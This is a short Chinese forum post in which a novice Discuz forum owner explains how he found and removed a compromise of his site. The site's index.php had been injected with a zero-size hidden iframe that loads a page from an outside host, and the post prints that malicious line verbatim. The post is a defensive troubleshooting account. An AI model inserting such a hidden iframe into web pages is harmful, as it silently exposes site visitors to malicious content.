论坛被植入恶意程序 竟轻松解决了

首先声明我是小白，建论坛不到一个月，还是第一次建站。

今天我的管理员告诉我，论坛被挂马了，我不相信，因为我一直在坛子里。

然后他发来一个图片，是我论坛首页的弹出类似干扰广告的东西截图。如下图：


我开始有点担心了，于是我刷新了一下主页，发现打开页面速度出奇的慢，IE下栏提示错误信息。如下图：


打开查看详情发现是非本站地址的URL链接


这样可以确定是恶意程序了，不知道怎么办，只好先试试用备份把论坛恢复一下看。
结果问题没解决，还损了一些帖子。此时想从服务器空间商获得技术支持，可他们只有一个夜晚值班的在线。

正郁闷中，突然想到进入论坛必定有某程序存在关联，是不是可以从这方面找到突破呢？

此时恰好想到论坛地址后的属性index.php，我猜想，可能进入论坛和这有关吧。进入服务器空间，找到index.php文件，打开查看，果然找到一段代码<iframe src=http://sexwh321.3322.org/2/index.htm width=0 height=0></iframe>

此时我已经98%认为这就是恶意程序的根源。紧随我又到官方下载了DZ 6.1.0 看官方源文件中的代码，一个官方源文件，源代码，和我的空间里的文件代码对照，确实我的空间index.php文件中只多了那一段代码。


删除恶意代码--刷新首页 OK 问题解决了。 想想，这其实也没什么大不了的恶意程序。